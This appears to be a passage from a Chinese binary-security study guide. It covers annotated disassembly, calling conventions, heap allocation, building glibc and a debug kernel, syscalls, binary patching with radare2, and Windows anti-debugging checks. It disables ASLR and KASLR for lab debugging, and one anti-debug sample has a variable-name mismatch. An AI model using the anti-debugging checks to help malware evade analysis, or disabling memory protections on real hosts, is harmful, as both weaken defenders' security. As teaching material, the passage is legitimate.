0x00000587 <+36>: mov DWORD PTR [ebp-0xc],0x2 ;b 第一个入栈所以保存在 ebp-0xc 的位置,此句即 b=2
0x0000058e <+43>: push DWORD PTR [ebp-0xc] ;将 b 压入栈中
0x00000591 <+46>: push DWORD PTR [ebp-0x10] ;将 a 压入栈中
0x00000594 <+49>: call 0x53d <add> ;调用 add() 函数,返回值保存在 eax 中
0x00000599 <+54>: add esp,0x8 ;清理 add() 的参数
0x0000059c <+57>: sub esp,0x8 ;调整 esp 使 16 位对齐
0x0000059f <+60>: push eax ;eax 入栈
0x000005a0 <+61>: lea eax,[ebx-0x19b0] ;ebx-0x19b0 的地址保存到 eax,该地址处保存字符串 "%d\n"
0x000005a6 <+67>: push eax ;eax 入栈
0x000005a7 <+68>: call 0x3d0 <printf@plt> ;调用 printf() 函数
0x000005ac <+73>: add esp,0x10 ;调整栈顶指针 esp,清理 printf() 的参数
0x000005af <+76>: mov eax,0x0 ;eax=0x0
0x000005b4 <+81>: lea esp,[ebp-0x8] ;ebp-0x8 的地址保存到 esp
0x000005b7 <+84>: pop ecx ;弹栈恢复 ecx、ebx、ebp
0x000005b8 <+85>: pop ebx
0x000005b9 <+86>: pop ebp
0x000005ba <+87>: lea esp,[ecx-0x4] ;ecx-0x4 的地址保存到 esp
0x000005bd <+90>: ret ;返回,相当于 pop eip;
End of assembler dump.
gdb-peda$ disassemble add
Dump of assembler code for function add:
0x0000053d <+0>: push ebp ;保存调用 add() 函数之前的 ebp
0x0000053e <+1>: mov ebp,esp ;把调用 add() 之前的 esp 作为当前栈帧的 ebp
0x00000540 <+3>: sub esp,0x10 ;为局部变量 x、y 分配空间并做到 16 字节对齐
0x00000543 <+6>: call 0x5be <__x86.get_pc_thunk.ax> ;调用 <__x86.get_pc_thunk.ax> 函数,将 esp 强制转换为双字数据后保存到 eax
0x00000548 <+11>: add eax,0x1ab8 ;eax+0x1ab8
0x0000054d <+16>: mov eax,DWORD PTR [ebp+0x8] ;将 ebp+0x8 的数据 0x1 传送到 eax,ebp+0x4 为函数返回地址
0x00000550 <+19>: mov DWORD PTR [ebp-0x8],eax ;保存 eax 的值 0x1 到 ebp-0x8 的位置
0x00000553 <+22>: mov eax,DWORD PTR [ebp+0xc] ;将 ebp+0xc 的数据 0x2 传送到 eax
0x00000556 <+25>: mov DWORD PTR [ebp-0x4],eax ;保存 eax 的值 0x2 到 ebp-0x4 的位置
0x00000559 <+28>: mov edx,DWORD PTR [ebp-0x8] ;取出 ebp-0x8 的值 0x1 到 edx
0x0000055c <+31>: mov eax,DWORD PTR [ebp-0x4] ;取出 ebp-0x4 的值 0x2 到 eax
0x0000055f <+34>: add eax,edx ;eax+edx
0x00000561 <+36>: leave ;返回,相当于 mov esp,ebp; pop ebp;
0x00000562 <+37>: ret
End of assembler dump.
这里我们在 Linux 环境下,由于 ELF 文件的入口其实是 _start
而不是 main()
,所以我们还应该关注下面的函数:
gdb-peda$ disassemble _start
Dump of assembler code for function _start:
0x00000400 <+0>: xor ebp,ebp ;清零 ebp,表示下面的 main() 函数栈帧中 ebp 保存的上一级 ebp 为 0x00000000
0x00000402 <+2>: pop esi ;将 argc 存入 esi
0x00000403 <+3>: mov ecx,esp ;将栈顶地址(argv 和 env 数组的其实地址)传给 ecx
0x00000405 <+5>: and esp,0xfffffff0 ;栈 16 字节对齐
0x00000408 <+8>: push eax ;eax、esp、edx 入栈
0x00000409 <+9>: push esp
0x0000040a <+10>: push edx
0x0000040b <+11>: call 0x432 <_start+50> ;先将下一条指令地址 0x00000410 压栈,设置 esp 指向它,再调用 0x00000432 处的指令
0x00000410 <+16>: add ebx,0x1bf0 ;ebx+0x1bf0
0x00000416 <+22>: lea eax,[ebx-0x19d0] ;取 <__libc_csu_fini> 地址传给 eax,然后压栈
0x0000041c <+28>: push eax
0x0000041d <+29>: lea eax,[ebx-0x1a30] ;取 <__libc_csu_init> 地址传入 eax,然后压栈
0x00000423 <+35>: push eax
0x00000424 <+36>: push ecx ;ecx、esi 入栈保存
0x00000425 <+37>: push esi
0x00000426 <+38>: push DWORD PTR [ebx-0x8] ;调用 main() 函数之前保存返回地址,其实就是保存 main() 函数的入口地址
0x0000042c <+44>: call 0x3e0 <__libc_start_main@plt> ;call 指令调用 __libc_start_main 函数
0x00000431 <+49>: hlt ;hlt 指令使程序停止运行,处理器进入暂停状态,不执行任何操作,不影响标志。当 RESET 线上有复位信号、CPU 响应非屏蔽终端、CPU 响应可屏蔽终端 3 种情况之一时,CPU 脱离暂停状态,执行下一条指令
0x00000432 <+50>: mov ebx,DWORD PTR [esp] ;esp 强制转换为双字数据后保存到 ebx
0x00000435 <+53>: ret ;返回,相当于 pop eip;
0x00000436 <+54>: xchg ax,ax ;交换 ax 和 ax 的数据,相当于 nop
0x00000438 <+56>: xchg ax,ax
0x0000043a <+58>: xchg ax,ax
0x0000043c <+60>: xchg ax,ax
0x0000043e <+62>: xchg ax,ax
End of assembler dump.
函数调用约定
函数调用约定是对函数调用时如何传递参数的一种约定。调用函数前要先把参数压入栈然后再传递给函数。
一个调用约定大概有如下的内容:
- 函数参数的传递顺序和方式
- 栈的维护方式
- 名字修饰的策略
主要的函数调用约定如下,其中 cdecl 是 C 语言默认的调用约定:
调用约定 | 出栈方 | 参数传递 | 名字修饰 |
---|---|---|---|
cdecl | 函数调用方 | 从右到左的顺序压参数入栈 | 下划线+函数名 |
stdcall | 函数本身 | 从右到左的顺序压参数入栈 | 下划线+函数名+@+参数的字节数 |
fastcall | 函数本身 | 都两个 DWORD(4 字节)类型或者占更少字节的参数被放入寄存器,其他剩下的参数按从右到左的顺序压入栈 | @+函数名+@+参数的字节数 |
除了参数的传递之外,函数与调用方还可以通过返回值进行交互。当返回值不大于 4 字节时,返回值存储在 eax 寄存器中,当返回值在 5~8 字节时,采用 eax 和 edx 结合的形式返回,其中 eax 存储低 4 字节, edx 存储高 4 字节。
堆与内存管理
堆
堆是用于存放除了栈里的东西之外所有其他东西的内存区域,有动态内存分配器负责维护。分配器将堆视为一组不同大小的块(block)的集合来维护,每个块就是一个连续的虚拟内存器片(chunk)。当使用 malloc()
和 free()
时就是在操作堆中的内存。对于堆来说,释放工作由程序员控制,容易产生内存泄露。
堆是向高地址扩展的数据结构,是不连续的内存区域。这是由于系统是用链表来存储的空闲内存地址的,而链表的遍历方向是由低地址向高地址。堆的大小受限于计算机系统中有效的虚拟内存。由此可见,堆获得的空间比较灵活,也比较大。
如果每次申请内存时都直接使用系统调用,会严重影响程序的性能。通常情况下,运行库先向操作系统“批发”一块较大的堆空间,然后“零售”给程序使用。当全部“售完”之后或者剩余空间不能满足程序的需求时,再根据情况向操作系统“进货”。
进程堆管理
Linux 提供了两种堆空间分配的方式,一个是 brk()
系统调用,另一个是 mmap()
系统调用。可以使用 man brk
、man mmap
查看。
brk()
的声明如下:
#include <unistd.h>
int brk(void *addr);
void *sbrk(intptr_t increment);
参数 *addr
是进程数据段的结束地址,brk()
通过改变该地址来改变数据段的大小,当结束地址向高地址移动,进程内存空间增大,当结束地址向低地址移动,进程内存空间减小。brk()
调用成功时返回 0,失败时返回 -1。 sbrk()
与 brk()
类似,但是参数 increment
表示增量,即增加或减少的空间大小,调用成功时返回增加后减小前数据段的结束地址,失败时返回 -1。
在上图中我们看到 brk 指示堆结束地址,start_brk 指示堆开始地址。BSS segment 和 heap 之间有一段 Random brk offset,这是由于 ASLR 的作用,如果关闭了 ASLR,则 Random brk offset 为 0,堆结束地址和数据段开始地址重合。
例子:源码
#include <stdio.h>
#include <unistd.h>
void main() {
void *curr_brk, *tmp_brk, *pre_brk;
printf("当前进程 PID:%d\n", getpid());
tmp_brk = curr_brk = sbrk(0);
printf("初始化后的结束地址:%p\n", curr_brk);
getchar();
brk(curr_brk+4096);
curr_brk = sbrk(0);
printf("brk 之后的结束地址:%p\n", curr_brk);
getchar();
pre_brk = sbrk(4096);
curr_brk = sbrk(0);
printf("sbrk 返回值(即之前的结束地址):%p\n", pre_brk);
printf("sbrk 之后的结束地址:%p\n", curr_brk);
getchar();
brk(tmp_brk);
curr_brk = sbrk(0);
printf("恢复到初始化时的结束地址:%p\n", curr_brk);
getchar();
}
开启两个终端,一个用于执行程序,另一个用于观察内存地址。首先我们看关闭了 ASLR 的情况。第一步初始化:
# echo 0 > /proc/sys/kernel/randomize_va_space
$ ./a.out
当前进程 PID:27759
初始化后的结束地址:0x56579000
# cat /proc/27759/maps
...
56557000-56558000 rw-p 00001000 08:01 28587506 /home/a.out
56558000-56579000 rw-p 00000000 00:00 0 [heap]
...
数据段结束地址和堆开始地址同为 0x56558000
,堆结束地址为 0x56579000
。
第二步使用 brk()
增加堆空间:
$ ./a.out
当前进程 PID:27759
初始化后的结束地址:0x56579000
brk 之后的结束地址:0x5657a000
# cat /proc/27759/maps
...
56557000-56558000 rw-p 00001000 08:01 28587506 /home/a.out
56558000-5657a000 rw-p 00000000 00:00 0 [heap]
...
堆开始地址不变,结束地址增加为 0x5657a000
。
第三步使用 sbrk()
增加堆空间:
$ ./a.out
当前进程 PID:27759
初始化后的结束地址:0x56579000
brk 之后的结束地址:0x5657a000
sbrk 返回值(即之前的结束地址):0x5657a000
sbrk 之后的结束地址:0x5657b000
# cat /proc/27759/maps
...
56557000-56558000 rw-p 00001000 08:01 28587506 /home/a.out
56558000-5657b000 rw-p 00000000 00:00 0 [heap]
...
第四步减小堆空间:
$ ./a.out
当前进程 PID:27759
初始化后的结束地址:0x56579000
brk 之后的结束地址:0x5657a000
sbrk 返回值(即之前的结束地址):0x5657a000
sbrk 之后的结束地址:0x5657b000
恢复到初始化时的结束地址:0x56579000
# cat /proc/27759/maps
...
56557000-56558000 rw-p 00001000 08:01 28587506 /home/a.out
56558000-56579000 rw-p 00000000 00:00 0 [heap]
...
再来看一下开启了 ASLR 的情况:
# echo 2 > /proc/sys/kernel/randomize_va_space
$ ./a.out
当前进程 PID:28025
初始化后的结束地址:0x578ad000
# cat /proc/28025/maps
...
5663f000-56640000 rw-p 00001000 08:01 28587506 /home/a.out
5788c000-578ad000 rw-p 00000000 00:00 0 [heap]
...
可以看到这时数据段的结束地址 0x56640000
不等于堆的开始地址 0x5788c000
。
mmap()
的声明如下:
#include <sys/mman.h>
void *mmap(void *addr, size_t len, int prot, int flags,
int fildes, off_t off);
mmap()
函数用于创建新的虚拟内存区域,并将对象映射到这些区域中,当它不将地址空间映射到某个文件时,我们称这块空间为匿名(Anonymous)空间,匿名空间可以用来作为堆空间。mmap()
函数要求内核创建一个从地址 addr
开始的新虚拟内存区域,并将文件描述符 fildes
指定的对象的一个连续的片(chunk)映射到这个新区域。连续的对象片大小为 len
字节,从距文件开始处偏移量为 off
字节的地方开始。prot
描述虚拟内存区域的访问权限位,flags
描述被映射对象类型的位组成。
munmap()
则用于删除虚拟内存区域:
#include <sys/mman.h>
int munmap(void *addr, size_t len);
例子:源码
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>
void main() {
void *curr_brk;
printf("当前进程 PID:%d\n", getpid());
printf("初始化后\n");
getchar();
char *addr;
addr = mmap(NULL, (size_t)4096, PROT_READ|PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
printf("mmap 完成\n");
getchar();
munmap(addr, (size_t)4096);
printf("munmap 完成\n");
getchar();
}
第一步初始化:
$ ./a.out
当前进程 PID:28652
初始化后
# cat /proc/28652/maps
...
f76b2000-f76b5000 rw-p 00000000 00:00 0
f76ef000-f76f1000 rw-p 00000000 00:00 0
...
第二步 mmap:
]$ ./a.out
当前进程 PID:28652
初始化后
mmap 完成
# cat /proc/28652/maps
...
f76b2000-f76b5000 rw-p 00000000 00:00 0
f76ee000-f76f1000 rw-p 00000000 00:00 0
...
第三步 munmap:
$ ./a.out
当前进程 PID:28652
初始化后
mmap 完成
munmap 完成
# cat /proc/28652/maps
...
f76b2000-f76b5000 rw-p 00000000 00:00 0
f76ef000-f76f1000 rw-p 00000000 00:00 0
...
可以看到第二行第一列地址从 f76ef000
->f76ee000
->f76ef000
变化。0xf76ee000-0xf76ef000=0x1000=4096
。
通常情况下,我们不会直接使用 brk()
和 mmap()
来分配堆空间,C 标准库提供了一个叫做 malloc
的分配器,程序通过调用 malloc()
函数来从堆中分配块,声明如下:
#include <stdlib.h>
void *malloc(size_t size);
void free(void *ptr);
void *calloc(size_t nmemb, size_t size);
void *realloc(void *ptr, size_t size);
示例:
#include<stdio.h>
#include<malloc.h>
void foo(int n) {
int *p;
p = (int *)malloc(n * sizeof(int));
for (int i=0; i<n; i++) {
p[i] = i;
printf("%d ", p[i]);
}
printf("\n");
free(p);
}
void main() {
int n;
scanf("%d", &n);
foo(n);
}
运行结果:
$ ./malloc
4
0 1 2 3
$ ./malloc
8
0 1 2 3 4 5 6 7
$ ./malloc
16
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
使用 gdb 查看反汇编代码:
gdb-peda$ disassemble foo
Dump of assembler code for function foo:
0x0000066d <+0>: push ebp
0x0000066e <+1>: mov ebp,esp
0x00000670 <+3>: push ebx
0x00000671 <+4>: sub esp,0x14
0x00000674 <+7>: call 0x570 <__x86.get_pc_thunk.bx>
0x00000679 <+12>: add ebx,0x1987
0x0000067f <+18>: mov eax,DWORD PTR [ebp+0x8]
0x00000682 <+21>: shl eax,0x2
0x00000685 <+24>: sub esp,0xc
0x00000688 <+27>: push eax
0x00000689 <+28>: call 0x4e0 <malloc@plt>
0x0000068e <+33>: add esp,0x10
0x00000691 <+36>: mov DWORD PTR [ebp-0xc],eax
0x00000694 <+39>: mov DWORD PTR [ebp-0x10],0x0
0x0000069b <+46>: jmp 0x6d9 <foo+108>
0x0000069d <+48>: mov eax,DWORD PTR [ebp-0x10]
0x000006a0 <+51>: lea edx,[eax*4+0x0]
0x000006a7 <+58>: mov eax,DWORD PTR [ebp-0xc]
0x000006aa <+61>: add edx,eax
0x000006ac <+63>: mov eax,DWORD PTR [ebp-0x10]
0x000006af <+66>: mov DWORD PTR [edx],eax
0x000006b1 <+68>: mov eax,DWORD PTR [ebp-0x10]
0x000006b4 <+71>: lea edx,[eax*4+0x0]
0x000006bb <+78>: mov eax,DWORD PTR [ebp-0xc]
0x000006be <+81>: add eax,edx
0x000006c0 <+83>: mov eax,DWORD PTR [eax]
0x000006c2 <+85>: sub esp,0x8
0x000006c5 <+88>: push eax
0x000006c6 <+89>: lea eax,[ebx-0x17e0]
0x000006cc <+95>: push eax
0x000006cd <+96>: call 0x4b0 <printf@plt>
0x000006d2 <+101>: add esp,0x10
0x000006d5 <+104>: add DWORD PTR [ebp-0x10],0x1
0x000006d9 <+108>: mov eax,DWORD PTR [ebp-0x10]
0x000006dc <+111>: cmp eax,DWORD PTR [ebp+0x8]
0x000006df <+114>: jl 0x69d <foo+48>
0x000006e1 <+116>: sub esp,0xc
0x000006e4 <+119>: push 0xa
0x000006e6 <+121>: call 0x500 <putchar@plt>
0x000006eb <+126>: add esp,0x10
0x000006ee <+129>: sub esp,0xc
0x000006f1 <+132>: push DWORD PTR [ebp-0xc]
0x000006f4 <+135>: call 0x4c0 <free@plt>
0x000006f9 <+140>: add esp,0x10
0x000006fc <+143>: nop
0x000006fd <+144>: mov ebx,DWORD PTR [ebp-0x4]
0x00000700 <+147>: leave
0x00000701 <+148>: ret
End of assembler dump.
关于 glibc 中的 malloc 实现是一个很重要的话题,我们会在后面的章节详细介绍。
glibc malloc
glibc
glibc 即 GNU C Library,是为 GNU 操作系统开发的一个 C 标准库。glibc 主要由两部分组成,一部分是头文件,位于 /usr/include
;另一部分是库的二进制文件。二进制文件部分主要是 C 语言标准库,有动态和静态两个版本,动态版本位于 /lib/libc.so.6
,静态版本位于 /usr/lib/libc.a
。
这一章中,我们将阅读分析 glibc 的源码,下面先把它下载下来,并切换到我们需要的版本:
$ git clone git://sourceware.org/git/glibc.git
$ cd glibc
$ git checkout --track -b local_glibc-2.23 origin/release/2.23/master
下面来编译它,首先修改配置文件 Makeconfig,将 -Werror
注释掉,这样可以避免高版本 GCC(v8.1.0) 将警告当做错误处理:
$ cat Makeconfig | grep -i werror | grep warn
+gccwarn += #-Werror
接下来需要打上一个 patch:
$ cat regexp.patch
diff --git a/misc/regexp.c b/misc/regexp.c
index 19d76c0..9017bc1 100644
--- a/misc/regexp.c
+++ b/misc/regexp.c
@@ -29,14 +29,17 @@
#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_23)
-/* Define the variables used for the interface. */
-char *loc1;
-char *loc2;
+#include <stdlib.h> /* Get NULL. */
+
+/* Define the variables used for the interface. Avoid .symver on common
+ symbol, which just creates a new common symbol, not an alias. */
+char *loc1 = NULL;
+char *loc2 = NULL;
compat_symbol (libc, loc1, loc1, GLIBC_2_0);
compat_symbol (libc, loc2, loc2, GLIBC_2_0);
/* Although we do not support the use we define this variable as well. */
-char *locs;
+char *locs = NULL;
compat_symbol (libc, locs, locs, GLIBC_2_0);
$ patch misc/regexp.c regexp.patch
然后就可以编译了:
$ mkdir build && cd build
$ ../configure --prefix=/usr/local/glibc-2.23
$ make -j4 && sudo make install
如果我们想要在编译程序时指定 libc,可以像这样:
$ gcc -L/usr/local/glibc-2.23/lib -Wl,--rpath=/usr/local/glibc-2.23/lib -Wl,-I/usr/local/glibc-2.23/lib/ld-2.23.so test.c
$ ldd a.out
linux-vdso.so.1 (0x00007ffcc76b0000)
libc.so.6 => /usr/local/glibc-2.23/lib/libc.so.6 (0x00007f6abd578000)
/usr/local/glibc-2.23/lib/ld-2.23.so => /usr/lib64/ld-linux-x86-64.so.2 (0x00007f6abdb1c000)
然后如果希望在调试时指定 libc 的源文件,可以使用 gdb 命令 directory
,但是这种方法的缺点是不能解析子目录,所以推荐使用下面的命令在启动时加载:
gdb `find ~/path/to/glibc/source -type d -printf '-d %p '` ./a.out
malloc.c
下面我们先分析 glibc 2.23 版本的源码,它是 Ubuntu16.04 的默认版本,在 pwn 中也最常见。然后,我们再探讨新版本的 glibc 中所加入的漏洞缓解机制。
相关结构
堆块结构
- Allocated Chunk
- Free Chunk
- Top Chunk
Bins 结构
- Fast Bins
- Small Bins
- Large Bins
- Unsorted Bins
Arena 结构
分配函数
_int_malloc()
释放函数
_int_free()
重分配函数
_int_realloc()
Linux 内核
编译安装
我的编译环境是如下。首先安装必要的软件:
$ uname -a
Linux firmy-pc 4.14.34-1-MANJARO #1 SMP PREEMPT Thu Apr 12 17:26:43 UTC 2018 x86_64 GNU/Linux
$ yaourt -S base-devel
为了方便学习,选择一个稳定版本,比如最新的 4.16.3。
$ mkdir ~/kernelbuild && cd ~/kernelbuild
$ wget -c https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-4.16.3.tar.xz
$ tar -xvJf linux-4.16.3.tar.xz
$ cd linux-4.16.3/
$ make clean && make mrproper
内核的配置选项在 .config
文件中,有两种方法可以设置这些选项,一种是从当前内核中获得一份默认配置:
$ zcat /proc/config.gz > .config
$ make oldconfig
另一种是自己生成一份配置:
$ make localmodconfig # 使用当前内核配置生成
# OR
$ make defconfig # 根据当前架构默认的配置生成
为了能够对内核进行调试,需要设置下面的参数:
CONFIG_DEBUG_INFO=y
CONFIG_DEBUG_INFO_REDUCED=n
CONFIG_GDB_SCRIPTS=y
如果需要使用 kgdb,还需要开启下面的参数:
CONFIG_STRICT_KERNEL_RWX=n
CONFIG_FRAME_POINTER=y
CONFIG_KGDB=y
CONFIG_KGDB_SERIAL_CONSOLE=y
CONFIG_STRICT_KERNEL_RWX
会将特定的内核内存空间标记为只读,这将阻止你使用软件断点,最好将它关掉。 如果希望使用 kdb,在上面的基础上再加上:
CONFIG_KGDB_KDB=y
CONFIG_KDB_KEYBOARD=y
另外如果你在调试时不希望被 KASLR 干扰,可以在编译时关掉它:
CONFIG_RANDOMIZE_BASE=n
CONFIG_RANDOMIZE_MEMORY=n
将上面的参数写到文件 .config-fragment
,然后合并进 .config
:
$ ./scripts/kconfig/merge_config.sh .config .config-fragment
最后因为内核编译默认开启了 -O2
优化,可以修改 Makefile 为 -O0
:
KBUILD_CFLAGS += -O0
编译内核:
$ make
完成后当然就是安装,但我们这里并不是真的要将本机的内核换掉,接下来的过程就交给 QEMU 了。(参考章节4.1)
系统调用
在 Linux 中,系统调用是一些内核空间函数,是用户空间访问内核的唯一手段。这些函数与 CPU 架构有关,x86-64 架构提供了 322 个系统调用,x86 提供了 358 个系统调用(参考附录9.4)。
下面是一个用 32 位汇编写的例子,源码:
.data
msg:
.ascii "hello 32-bit!\n"
len = . - msg
.text
.global _start
_start:
movl $len, %edx
movl $msg, %ecx
movl $1, %ebx
movl $4, %eax
int $0x80
movl $0, %ebx
movl $1, %eax
int $0x80
编译执行(可以编译成64位程序的):
$ gcc -m32 -c hello32.S
$ ld -m elf_i386 -o hello32 hello32.o
$ strace ./hello32
execve("./hello32", ["./hello32"], 0x7ffff990f830 /* 68 vars */) = 0
strace: [ Process PID=19355 runs in 32 bit mode. ]
write(1, "hello 32-bit!\n", 14hello 32-bit!
) = 14
exit(0) = ?
+++ exited with 0 +++
可以看到程序将调用号保存到 eax
,并通过 int $0x80
来使用系统调用。
虽然软中断 int 0x80
非常经典,早期 2.6 及以前版本的内核都使用这种机制进行系统调用。但因其性能较差,在往后的内核中使用了快速系统调用指令来替代,32 位系统使用 sysenter
(对应sysexit
) 指令,而 64 位系统使用 syscall
(对应sysret
) 指令。
一个使用 sysenter 的例子:
.data
msg:
.ascii "Hello sysenter!\n"
len = . - msg
.text
.globl _start
_start:
movl $len, %edx
movl $msg, %ecx
movl $1, %ebx
movl $4, %eax
# Setting the stack for the systenter
pushl $sysenter_ret
pushl %ecx
pushl %edx
pushl %ebp
movl %esp, %ebp
sysenter
sysenter_ret:
movl $0, %ebx
movl $1, %eax
# Setting the stack for the systenter
pushl $sysenter_ret
pushl %ecx
pushl %edx
pushl %ebp
movl %esp, %ebp
sysenter
$ gcc -m32 -c sysenter.S
$ ld -m elf_i386 -o sysenter sysenter.o
$ strace ./sysenter
execve("./sysenter", ["./sysenter"], 0x7fff73993fd0 /* 69 vars */) = 0
strace: [ Process PID=7663 runs in 32 bit mode. ]
write(1, "Hello sysenter!\n", 16Hello sysenter!
) = 16
exit(0) = ?
+++ exited with 0 +++
可以看到,为了使用 sysenter 指令,需要为其手动布置栈。这是因为在 sysenter 返回时,会执行 __kernel_vsyscall
的后半部分(从0xf7fd5059开始):
gdb-peda$ vmmap vdso
Start End Perm Name
0xf7fd4000 0xf7fd6000 r-xp [vdso]
gdb-peda$ disassemble __kernel_vsyscall
Dump of assembler code for function __kernel_vsyscall:
0xf7fd5050 <+0>: push ecx
0xf7fd5051 <+1>: push edx
0xf7fd5052 <+2>: push ebp
0xf7fd5053 <+3>: mov ebp,esp
0xf7fd5055 <+5>: sysenter
0xf7fd5057 <+7>: int 0x80
0xf7fd5059 <+9>: pop ebp
0xf7fd505a <+10>: pop edx
0xf7fd505b <+11>: pop ecx
0xf7fd505c <+12>: ret
End of assembler dump.
__kernel_vsyscall
封装了 sysenter 调用的规范,是 vDSO 的一部分,而 vDSO 允许程序在用户层中执行内核代码。关于 vDSO 的内容我们将在后面的章节中细讲。
下面是一个 64 位使用 syscall
的例子:
.data
msg:
.ascii "Hello 64-bit!\n"
len = . - msg
.text
.global _start
_start:
movq $1, %rdi
movq $msg, %rsi
movq $len, %rdx
movq $1, %rax
syscall
xorq %rdi, %rdi
movq $60, %rax
syscall
编译执行(不能编译成32位程序):
$ gcc -c hello64.S
$ ld -o hello64 hello64.o
$ strace ./hello64
execve("./hello64", ["./hello64"], 0x7ffe11485290 /* 68 vars */) = 0
write(1, "Hello 64-bit!\n", 14Hello 64-bit!
) = 14
exit(0) = ?
+++ exited with 0 +++
在这两个例子中我们直接使用了 execve
、write
和 exit
三个系统调用。但一般情况下,应用程序通过在用户空间实现的应用编程接口(API)而不是直接通过系统调用来编程。例如函数 printf()
的调用过程是这样的:
调用printf() ==> C库中的printf() ==> C库中的write() ==> write()系统调用
patch 二进制文件
什么是 patch
许多时候,我们不能获得程序源码,只能直接对二进制文件进行修改,这就是所谓的 patch,你可以使用十六进制编辑器直接修改文件的字节,也可以利用一些半自动化的工具。
patch 有很多种形式:
- patch 二进制文件(程序或库)
- 在内存里 patch(利用调试器)
- 预加载库替换原库文件中的函数
- triggers(hook 然后在运行时 patch)
手工 patch
手工 patch 自然会比较麻烦,但能让我们更好地理解一个二进制文件的构成,以及程序的链接和加载。有许多工具可以做到这一点,比如 xxd、dd、gdb、radare2 等等。
xxd
$ echo 01: 01 02 03 04 05 06 07 08 | xxd -r - output
$ xxd -g1 output
00000000: 00 01 02 03 04 05 06 07 08 .........
$ echo 04: 41 42 43 44 | xxd -r - output
$ xxd -g1 output
00000000: 00 01 02 03 41 42 43 44 08 ....ABCD.
参数 -r
用于将 hexdump 转换成 binary。这里我们先创建一个 binary,然后将将其中几个字节改掉。
radare2
一个简单的例子:
#include<stdio.h>
void main() {
printf("hello");
puts("world");
}
$ gcc -no-pie patch.c
$ ./a.out
helloworld
下面通过计算函数偏移,我们将 printf
换成 puts
:
[0x004004e0]> pdf @ main
;-- main:
/ (fcn) sym.main 36
| sym.main ();
| ; DATA XREF from 0x004004fd (entry0)
| 0x004005ca 55 push rbp
| 0x004005cb 4889e5 mov rbp, rsp
| 0x004005ce 488d3d9f0000. lea rdi, str.hello ; 0x400674 ; "hello"
| 0x004005d5 b800000000 mov eax, 0
| 0x004005da e8f1feffff call sym.imp.printf ; int printf(const char *format)
| 0x004005df 488d3d940000. lea rdi, str.world ; 0x40067a ; "world"
| 0x004005e6 e8d5feffff call sym.imp.puts ; sym.imp.printf-0x10 ; int printf(const char *format)
| 0x004005eb 90 nop
| 0x004005ec 5d pop rbp
\ 0x004005ed c3 ret
地址 0x004005da
处的语句是 call sym.imp.printf
,其中机器码 e8
代表 call
,所以 sym.imp.printf
的偏移是 0xfffffef1
。地址 0x004005e6
处的语句是 call sym.imp.puts
,sym.imp.puts
的偏移是 0xfffffed5
。
接下来找到两个函数的 plt 地址:
[0x004004e0]> is~printf
vaddr=0x004004d0 paddr=0x000004d0 ord=003 fwd=NONE sz=16 bind=GLOBAL type=FUNC name=imp.printf
[0x004004e0]> is~puts
vaddr=0x004004c0 paddr=0x000004c0 ord=002 fwd=NONE sz=16 bind=GLOBAL type=FUNC name=imp.puts
计算相对位置:
[0x004004e0]> ?v 0x004004d0-0x004004c0
0x10
所以要想将 printf
替换为 puts
,只要替换成 0xfffffef1 -0x10 = 0xfffffee1
就可以了。
[0x004004e0]> s 0x004005da
[0x004005da]> wx e8e1feffff
[0x004005da]> pd 1
| 0x004005da e8e1feffff call sym.imp.puts ; sym.imp.printf-0x10 ; int printf(const char *format)
搞定。
$ ./a.out
hello
world
当然还可以将这一过程更加简化,直接输入汇编,其他的事情 r2 会帮你搞定:
[0x004005da]> wa call 0x004004c0
Written 5 bytes (call 0x004004c0) = wx e8e1feffff
[0x004005da]> wa call sym.imp.puts
Written 5 bytes (call sym.imp.puts) = wx e8e1feffff
使用工具 patch
patchkit
patchkit 可以让我们通过 Python 脚本来 patch ELF 二进制文件。
反调试技术
什么是反调试
反调试是一种重要的软件保护技术,特别是在各种游戏保护中被尤其重视。另外,恶意代码往往也会利用反调试来对抗安全分析。当程序意识到自己可能处于调试中的时候,可能会改变正常的执行路径或者修改自身程序让自己崩溃,从而增加调试时间和复杂度。
反调试技术
下面先介绍几种 Windows 下的反调试方法。
函数检测
函数检测就是通过 Windows 自带的公开或未公开的函数直接检测程序是否处于调试状态。最简单的调试器检测函数是 IsDebuggerPresent()
:
BOOL WINAPI IsDebuggerPresent(void);
该函数查询进程环境块(PEB)中的 BeingDebugged
标志,如果进程处在调试上下文中,则返回一个非零值,否则返回零。
示例:
BOOL CheckDebug()
{
return IsDebuggerPresent();
}
CheckRemoteDebuggerPresent()
用于检测一个远程进程是否处于调试状态:
BOOL WINAPI CheckRemoteDebuggerPresent(
_In_ HANDLE hProcess,
_Inout_ PBOOL pbDebuggerPresent
);
如果 hProcess
句柄表示的进程处于调试上下文,则设置 pbDebuggerPresent
变量被设置为 TRUE
,否则被设置为 FALSE
。
BOOL CheckDebug()
{
BOOL ret;
CheckRemoteDebuggerPresent(GetCurrentProcess(), &ret);
return ret;
}
NtQueryInformationProcess
用于获取给定进程的信息:
NTSTATUS WINAPI NtQueryInformationProcess(
_In_ HANDLE ProcessHandle,
_In_ PROCESSINFOCLASS ProcessInformationClass,
_Out_ PVOID ProcessInformation,
_In_ ULONG ProcessInformationLength,
_Out_opt_ PULONG ReturnLength
);
第二个参数 ProcessInformationClass
给定了需要查询的进程信息类型。当给定值为 0
(ProcessBasicInformation
)或 7
(ProcessDebugPort
)时,就能得到相关调试信息,返回信息会写到第三个参数 ProcessInformation
指向的缓冲区中。
示例:
BOOL CheckDebug()
{
DWORD dbgport = 0;
HMODULE hModule = LoadLibrary("Ntdll.dll");
NtQueryInformationProcessPtr NtQueryInformationProcess = (NtQueryInformationProcessPtr)GetProcAddress(hModule, "NtQueryInformationProcess");
NtQueryInformationProcess(GetCurrentProcess(), 7, &dbgPort, sizeof(dbgPort), NULL);
return dbgPort != 0;
}
数据检测
数据检测是指程序通过测试一些与调试相关的关键位置的数据来判断是否处于调试状态。比如上面所说的 PEB 中的 BeingDebugged
参数。数据检测就是直接定位到这些数据地址并测试其中的数据,从而避免调用函数,使程序的行为更加隐蔽。
示例:
BOOL CheckDebug()
{
int BeingDebug = 0;
__asm
{
mov eax, dword ptr fs:[30h] ; 指向PEB基地址
mov eax, dword ptr [eax+030h]
movzx eax, byte ptr [eax+2]
mov BeingDebug, eax
}
return BeingDebug != 0;
}
